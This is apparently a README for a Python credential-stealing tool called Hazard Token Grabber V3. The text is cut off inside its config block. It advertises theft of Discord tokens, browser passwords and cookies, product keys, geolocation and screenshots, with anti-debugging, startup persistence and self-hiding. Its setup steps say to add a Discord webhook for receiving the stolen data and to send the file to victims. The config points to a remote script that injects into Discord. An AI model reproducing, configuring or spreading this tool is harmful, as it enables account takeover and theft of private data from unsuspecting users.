Hazard Token Grabber V3
Hazard-Token-Grabber-V3 was made with
CODE ✅
NOTE: \
Please star it if you like it ⭐
🌐 〢 Content
⚙️ 〢 Features
Anti-vm/Anti-debug
🟢Add to startup
🟢Hides itself
🟢Options are configurable
🟢Pretty Fast Even if it Was Made With Python
🟢Windows Product Key & Build Info
🟢IP & Geolocation. (Country, City, Google Maps Location)
🟢A screenshot of all their monitors
🟢All valid/working discord tokens. (Bypasses BetterDiscord, Token Protector and Discord's new encryption)
🟢Discord Injection ( you get there password if they change it )
🟢All Passwords, Cookies and History from Google
🟢
📁 〢 Setting up Hazard Token Grabber.V3
- Install python and add it to path.
- Open up hazard.py with notepad or some other editor
- Locate the config at the top of the file and Replace "WEBHOOK_HERE" with your discord webhook
- and save it
- for the file name , Put something in such as "Token_Logger" (You can always rename the file later)
- Send the file to victims. 😈
⚙ 〢 Config
If you want to change the config, open up main.py and locate it at the top. There you can configure the following:
config = {
# replace WEBHOOK_HERE with your webhook ↓↓
'webhook': "WEBHOOK_HERE",
# keep it as it is unless you want to have a custom one
'injection_url': "https://raw.githubusercontent.com/Rdmo1/Discord-Injection/master/injection.js",
# set to False if you don't want it to kill programs such as discord upon running the exe
'kill_processes': True,
# if you want the file to run at startup
'startup': True,
# if you want the file to hide itself after run
'hide_self': True,
# does it's best to prevent the program from being debugged and drastically reduces the changes of your webhook being found
'anti_debug': True,